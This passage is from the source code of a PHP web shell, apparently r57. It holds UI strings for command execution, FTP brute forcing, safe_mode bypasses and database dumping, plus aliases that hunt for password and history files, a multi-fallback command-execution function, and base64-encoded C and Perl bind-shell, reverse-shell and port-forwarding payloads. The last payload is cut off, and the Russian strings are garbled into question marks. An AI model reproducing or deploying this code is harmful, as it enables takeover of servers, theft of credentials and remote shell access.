855'ru_text93'=>'FTP',
856'ru_text94'=>'FTP-????????',
857'ru_text95'=>'?????? ?????????????',
858'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
859'ru_text97'=>'????????? ??????????: ',
860'ru_text98'=>'??????? ???????????: ',
861'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
862'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
863'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
864'ru_text102'=>'?????',
865'ru_text103'=>'???????? ??????',
866'ru_text104'=>'???????? ????? ?? ???????? ????',
867'ru_text105'=>'????',
868'ru_text106'=>'??',
869'ru_text107'=>'????',
870'ru_butt15'=>'?????????',
871'ru_text108'=>'????? ??????',
872'ru_text109'=>'????????',
873'ru_text110'=>'??????????',
874'ru_text111'=>'SQL-?????? : ????',
875'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail',
876'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list',
877'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body',
878'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()',
879'ru_text116'=>'?????????? ????',
880'ru_text117'=>'?',
881'ru_text118'=>'???? ??????????',
882'ru_text119'=>'?? ??????? ??????????? ????',
883'ru_err0'=>'??????! ?? ???? ???????? ? ???? ',
884'ru_err1'=>'??????! ?? ???? ????????? ???? ',
885'ru_err2'=>'??????! ?? ??????? ??????? ',
886'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????',
887'ru_err4'=>'?????? ??????????? ?? ftp ???????',
888'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????',
889'ru_err6'=>'??????! ?? ??????? ????????? ??????',
890'ru_err7'=>'?????? ??????????',
891/* --------------------------------------------------------------- */
892'eng_text1' =>'Executed command',
893'eng_text2' =>'Execute command on server',
894'eng_text3' =>'Run command',
895'eng_text4' =>'Work directory',
896'eng_text5' =>'Upload files on server',
897'eng_text6' =>'Local file',
898'eng_text7' =>'Aliases',
899'eng_text8' =>'Select alias',
900'eng_butt1' =>'Execute',
901'eng_butt2' =>'Upload',
902'eng_text9' =>'Bind port to /bin/bash',
903'eng_text10'=>'Port',
904'eng_text11'=>'Password for access',
905'eng_butt3' =>'Bind',
906'eng_text12'=>'back-connect',
907'eng_text13'=>'IP',
908'eng_text14'=>'Port',
909'eng_butt4' =>'Connect',
910'eng_text15'=>'Upload files from remote server',
911'eng_text16'=>'With',
912'eng_text17'=>'Remote file',
913'eng_text18'=>'Local file',
914'eng_text19'=>'Exploits',
915'eng_text20'=>'Use',
916'eng_text21'=>' New name',
917'eng_text22'=>'datapipe',
918'eng_text23'=>'Local port',
919'eng_text24'=>'Remote host',
920'eng_text25'=>'Remote port',
921'eng_text26'=>'Use',
922'eng_butt5' =>'Run',
923'eng_text28'=>'Work in safe_mode',
924'eng_text29'=>'ACCESS DENIED',
925'eng_butt6' =>'Change',
926'eng_text30'=>'Cat file',
927'eng_butt7' =>'Show',
928'eng_text31'=>'File not found',
929'eng_text32'=>'Eval PHP code',
930'eng_text33'=>'Test bypass open_basedir with cURL functions',
931'eng_butt8' =>'Test',
932'eng_text34'=>'Test bypass safe_mode with include function',
933'eng_text35'=>'Test bypass safe_mode with load file in mysql',
934'eng_text36'=>'Database . Table',
935'eng_text37'=>'Login',
936'eng_text38'=>'Password',
937'eng_text39'=>'Database',
938'eng_text40'=>'Dump database table',
939'eng_butt9' =>'Dump',
940'eng_text41'=>'Save dump in file',
941'eng_text42'=>'Edit files',
942'eng_text43'=>'File for edit',
943'eng_butt10'=>'Save',
944'eng_text44'=>'Can\'t edit file! Only read access!',
945'eng_text45'=>'File saved',
946'eng_text46'=>'Show phpinfo()',
947'eng_text47'=>'Show variables from php.ini',
948'eng_text48'=>'Delete temp files',
949'eng_butt11'=>'Edit file',
950'eng_text49'=>'Delete script from server',
951'eng_text50'=>'View cpu info',
952'eng_text51'=>'View memory info',
953'eng_text52'=>'Find text',
954'eng_text53'=>'In dirs',
955'eng_text54'=>'Find text in files',
956'eng_butt12'=>'Find',
957'eng_text55'=>'Only in files',
958'eng_text56'=>'Nothing :(',
959'eng_text57'=>'Create/Delete File/Dir',
960'eng_text58'=>'name',
961'eng_text59'=>'file',
962'eng_text60'=>'dir',
963'eng_butt13'=>'Create/Delete',
964'eng_text61'=>'File created',
965'eng_text62'=>'Dir created',
966'eng_text63'=>'File deleted',
967'eng_text64'=>'Dir deleted',
968'eng_text65'=>'Create',
969'eng_text66'=>'Delete',
970'eng_text67'=>'Chown/Chgrp/Chmod',
971'eng_text68'=>'Command',
972'eng_text69'=>'param1',
973'eng_text70'=>'param2',
974'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
975'eng_text72'=>'Text for find',
976'eng_text73'=>'Find in folder',
977'eng_text74'=>'Find in files',
978'eng_text75'=>'* you can use regexp',
979'eng_text76'=>'Search text in files via find',
980'eng_text80'=>'Type',
981'eng_text81'=>'Net',
982'eng_text82'=>'Databases',
983'eng_text83'=>'Run SQL query',
984'eng_text84'=>'SQL query',
985'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
986'eng_text86'=>'Download files from server',
987'eng_butt14'=>'Download',
988'eng_text87'=>'Download files from remote ftp-server',
989'eng_text88'=>'FTP-server:port',
990'eng_text89'=>'File on ftp',
991'eng_text90'=>'Transfer mode',
992'eng_text91'=>'Archivation',
993'eng_text92'=>'without archivation',
994'eng_text93'=>'FTP',
995'eng_text94'=>'FTP-bruteforce',
996'eng_text95'=>'Users list',
997'eng_text96'=>'Can\'t get users list',
998'eng_text97'=>'checked: ',
999'eng_text98'=>'success: ',
1000'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
1001'eng_text100'=>'Send file to remote ftp server',
1002'eng_text101'=>'Use reverse (user -> resu) login for password',
1003'eng_text102'=>'Mail',
1004'eng_text103'=>'Send email',
1005'eng_text104'=>'Send file to email',
1006'eng_text105'=>'To',
1007'eng_text106'=>'From',
1008'eng_text107'=>'Subj',
1009'eng_butt15'=>'Send',
1010'eng_text108'=>'Mail',
1011'eng_text109'=>'Hide',
1012'eng_text110'=>'Show',
1013'eng_text111'=>'SQL-Server : Port',
1014'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
1015'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
1016'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
1017'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
1018'eng_text116'=>'Copy from',
1019'eng_text117'=>'to',
1020'eng_text118'=>'File copied',
1021'eng_text119'=>'Cant copy file',
1022'eng_err0'=>'Error! Can\'t write in file ',
1023'eng_err1'=>'Error! Can\'t read file ',
1024'eng_err2'=>'Error! Can\'t create ',
1025'eng_err3'=>'Error! Can\'t connect to ftp',
1026'eng_err4'=>'Error! Can\'t login on ftp server',
1027'eng_err5'=>'Error! Can\'t change dir on ftp',
1028'eng_err6'=>'Error! Can\'t sent mail',
1029'eng_err7'=>'Mail send',
1030);
1031/*
1032?????? ??????
1033????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
1034?? ?????? ???? ????????? ??? ???????? ???????.
1035*/
1036$aliases=array(
1037'find suid files'=>'find / -type f -perm -04000 -ls',
1038'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
1039'find sgid files'=>'find / -type f -perm -02000 -ls',
1040'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
1041'find config.inc.php files'=>'find / -type f -name config.inc.php',
1042'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
1043'find config* files'=>'find / -type f -name "config*"',
1044'find config* files in current dir'=>'find . -type f -name "config*"',
1045'find all writable files'=>'find / -type f -perm -2 -ls',
1046'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
1047'find all writable directories'=>'find / -type d -perm -2 -ls',
1048'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
1049'find all writable directories and files'=>'find / -perm -2 -ls',
1050'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
1051'find all service.pwd files'=>'find / -type f -name service.pwd',
1052'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
1053'find all .htpasswd files'=>'find / -type f -name .htpasswd',
1054'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
1055'find all .bash_history files'=>'find / -type f -name .bash_history',
1056'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
1057'find all .mysql_history files'=>'find / -type f -name .mysql_history',
1058'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
1059'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
1060'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
1061'list file attributes on a Linux second extended file system'=>'lsattr -va',
1062'show opened ports'=>'netstat -an | grep -i listen',
1063'----------------------------------------------------------------------------------------------------'=>'ls -la'
1064);
1065$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
1066$table_up2 = " ::</div></b></font></td></tr><tr><td>";
1067$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
1068$table_end1 = "</td></tr>";
1069$arrow = " <font face=Webdings color=gray>4</font>";
1070$lb = "<font color=black>[</font>";
1071$rb = "<font color=black>]</font>";
1072$font = "<font face=Verdana size=-2>";
1073$ts = "<table class=table1 width=100% align=center>";
1074$te = "</table>";
1075$fs = "<form name=form method=POST>";
1076$fe = "</form>";
1077
1078if(isset($_GET['users']))
1079 {
1080 if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
1081 else
1082 {
1083 echo '<center>';
1084 foreach($users as $user) { echo $user."<br>"; }
1085 echo '</center>';
1086 }
1087 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
1088 }
1089
1090if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
1091$dir = @getcwd();
1092$unix = 0;
1093if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
1094if(empty($dir))
1095 {
1096 $os = getenv('OS');
1097 if(empty($os)){ $os = php_uname(); }
1098 if(empty($os)){ $os ="-"; $unix=1; }
1099 else
1100 {
1101 if(@eregi("^win",$os)) { $unix = 0; }
1102 else { $unix = 1; }
1103 }
1104 }
1105if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
1106 {
1107 echo $head;
1108 if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
1109 else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
1110 $sr->SearchText(0,0);
1111 $res = $sr->GetResultFiles();
1112 $found = $sr->GetMatchesCount();
1113 $titles = $sr->GetTitles();
1114 $r = "";
1115 if($found > 0)
1116 {
1117 $r .= "<TABLE width=100%>";
1118 foreach($res as $file=>$v)
1119 {
1120 $r .= "<TR>";
1121 $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
1122 $r .= (!$unix)? str_replace("/","\\",$file) : $file;
1123 $r .= "</b></font></ TD>";
1124 $r .= "</TR>";
1125 foreach($v as $a=>$b)
1126 {
1127 $r .= "<TR>";
1128 $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
1129 $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
1130 $r .= "</TR>\n";
1131 }
1132 }
1133 $r .= "</TABLE>";
1134 echo $r;
1135 }
1136 else
1137 {
1138 echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
1139 }
1140 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1141 die();
1142 }
1143if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
1144$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
1145if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
1146function ws($i)
1147{
1148return @str_repeat(" ",$i);
1149}
1150function ex($cfe)
1151{
1152 $res = '';
1153 if (!empty($cfe))
1154 {
1155 if(function_exists('exec'))
1156 {
1157 @exec($cfe,$res);
1158 $res = join("\n",$res);
1159 }
1160 elseif(function_exists('shell_exec'))
1161 {
1162 $res = @shell_exec($cfe);
1163 }
1164 elseif(function_exists('system'))
1165 {
1166 @ob_start();
1167 @system($cfe);
1168 $res = @ob_get_contents();
1169 @ob_end_clean();
1170 }
1171 elseif(function_exists('passthru'))
1172 {
1173 @ob_start();
1174 @passthru($cfe);
1175 $res = @ob_get_contents();
1176 @ob_end_clean();
1177 }
1178 elseif(@is_resource($f = @popen($cfe,"r")))
1179 {
1180 $res = "";
1181 while(!@feof($f)) { $res .= @fread($f,1024); }
1182 @pclose($f);
1183 }
1184 }
1185 return $res;
1186}
1187function get_users()
1188{
1189 $users = array();
1190 $rows=file('/etc/passwd');
1191 if(!$rows) return 0;
1192 foreach ($rows as $string)
1193 {
1194 $user = @explode(":",$string);
1195 if(substr($string,0,1)!='#') array_push($users,$user[0]);
1196 }
1197 return $users;
1198}
1199function err($n,$txt='')
1200{
1201echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';
1202echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
1203if(!empty($txt)) { echo " $txt"; }
1204echo '</b></div></font></td></tr></table>';
1205return null;
1206}
1207function perms($mode)
1208{
1209if (!$GLOBALS['unix']) return 0;
1210if( $mode & 0x1000 ) { $type='p'; }
1211else if( $mode & 0x2000 ) { $type='c'; }
1212else if( $mode & 0x4000 ) { $type='d'; }
1213else if( $mode & 0x6000 ) { $type='b'; }
1214else if( $mode & 0x8000 ) { $type='-'; }
1215else if( $mode & 0xA000 ) { $type='l'; }
1216else if( $mode & 0xC000 ) { $type='s'; }
1217else $type='u';
1218$owner["read"] = ($mode & 00400) ? 'r' : '-';
1219$owner["write"] = ($mode & 00200) ? 'w' : '-';
1220$owner["execute"] = ($mode & 00100) ? 'x' : '-';
1221$group["read"] = ($mode & 00040) ? 'r' : '-';
1222$group["write"] = ($mode & 00020) ? 'w' : '-';
1223$group["execute"] = ($mode & 00010) ? 'x' : '-';
1224$world["read"] = ($mode & 00004) ? 'r' : '-';
1225$world["write"] = ($mode & 00002) ? 'w' : '-';
1226$world["execute"] = ($mode & 00001) ? 'x' : '-';
1227if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
1228if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
1229if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
1230$s=sprintf("%1s", $type);
1231$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
1232$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
1233$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
1234return trim($s);
1235}
1236function in($type,$name,$size,$value,$checked=0)
1237{
1238 $ret = "<input type=".$type." name=".$name." ";
1239 if($size != 0) { $ret .= "size=".$size." "; }
1240 $ret .= "value=\"".$value."\"";
1241 if($checked) $ret .= " checked";
1242 return $ret.">";
1243}
1244function which($pr)
1245{
1246$path = ex("which $pr");
1247if(!empty($path)) { return $path; } else { return $pr; }
1248}
1249function cf($fname,$text)
1250{
1251 $w_file=@fopen($fname,"w") or err(0);
1252 if($w_file)
1253 {
1254 @fputs($w_file,@base64_decode($text));
1255 @fclose($w_file);
1256 }
1257}
1258function sr($l,$t1,$t2)
1259 {
1260 return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
1261 }
1262if (!@function_exists("view_size"))
1263{
1264function view_size($size)
1265{
1266 if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
1267 elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
1268 elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
1269 else {$size = $size . " B";}
1270 return $size;
1271}
1272}
1273 function DirFilesR($dir,$types='')
1274 {
1275 $files = Array();
1276 if(($handle = @opendir($dir)))
1277 {
1278 while (false !== ($file = @readdir($handle)))
1279 {
1280 if ($file != "." && $file != "..")
1281 {
1282 if(@is_dir($dir."/".$file))
1283 $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
1284 else
1285 {
1286 $pos = @strrpos($file,".");
1287 $ext = @substr($file,$pos,@strlen($file)-$pos);
1288 if($types)
1289 {
1290 if(@in_array($ext,explode(';',$types)))
1291 $files[] = $dir."/".$file;
1292 }
1293 else
1294 $files[] = $dir."/".$file;
1295 }
1296 }
1297 }
1298 @closedir($handle);
1299 }
1300 return $files;
1301 }
1302 class SearchResult
1303 {
1304 var $text;
1305 var $FilesToSearch;
1306 var $ResultFiles;
1307 var $FilesTotal;
1308 var $MatchesCount;
1309 var $FileMatschesCount;
1310 var $TimeStart;
1311 var $TimeTotal;
1312 var $titles;
1313 function SearchResult($dir,$text,$filter='')
1314 {
1315 $dirs = @explode(";",$dir);
1316 $this->FilesToSearch = Array();
1317 for($a=0;$a<count($dirs);$a++)
1318 $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
1319 $this->text = $text;
1320 $this->FilesTotal = @count($this->FilesToSearch);
1321 $this->TimeStart = getmicrotime();
1322 $this->MatchesCount = 0;
1323 $this->ResultFiles = Array();
1324 $this->FileMatchesCount = Array();
1325 $this->titles = Array();
1326 }
1327 function GetFilesTotal() { return $this->FilesTotal; }
1328 function GetTitles() { return $this->titles; }
1329 function GetTimeTotal() { return $this->TimeTotal; }
1330 function GetMatchesCount() { return $this->MatchesCount; }
1331 function GetFileMatchesCount() { return $this->FileMatchesCount; }
1332 function GetResultFiles() { return $this->ResultFiles; }
1333 function SearchText($phrase=0,$case=0) {
1334 $qq = @explode(' ',$this->text);
1335 $delim = '|';
1336 if($phrase)
1337 foreach($qq as $k=>$v)
1338 $qq[$k] = '\b'.$v.'\b';
1339 $words = '('.@implode($delim,$qq).')';
1340 $pattern = "/".$words."/";
1341 if(!$case)
1342 $pattern .= 'i';
1343 foreach($this->FilesToSearch as $k=>$filename)
1344 {
1345 $this->FileMatchesCount[$filename] = 0;
1346 $FileStrings = @file($filename) or @next;
1347 for($a=0;$a<@count($FileStrings);$a++)
1348 {
1349 $count = 0;
1350 $CurString = $FileStrings[$a];
1351 $CurString = @Trim($CurString);
1352 $CurString = @strip_tags($CurString);
1353 $aa = '';
1354 if(($count = @preg_match_all($pattern,$CurString,$aa)))
1355 {
1356 $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
1357 $this->ResultFiles[$filename][$a+1] = $CurString;
1358 $this->MatchesCount += $count;
1359 $this->FileMatchesCount[$filename] += $count;
1360 }
1361 }
1362 }
1363 $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
1364 }
1365 }
1366 function getmicrotime()
1367 {
1368 list($usec,$sec) = @explode(" ",@microtime());
1369 return ((float)$usec + (float)$sec);
1370 }
1371$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
1372A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
1373GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
1374b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
1375pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
1376NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
1377ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
1378ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
13797DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
13809tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
13812ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
1382dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
1383lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
1384$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
1385VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
1386JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
1387TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
1388lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
1389Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
1390Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
1391lIENPTk47DQpleGl0IDA7DQp9DQp9";
1392$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
1393aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
1394hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
1395sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
1396kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
1397KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
1398OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1399$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
1400BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
1401SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
1402KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
1403sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
1404Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
1405QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
1406Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1407$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
1408x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
1409HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
1410aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
1411lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
1412xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
1413W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
1414LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
1415udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
14160KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
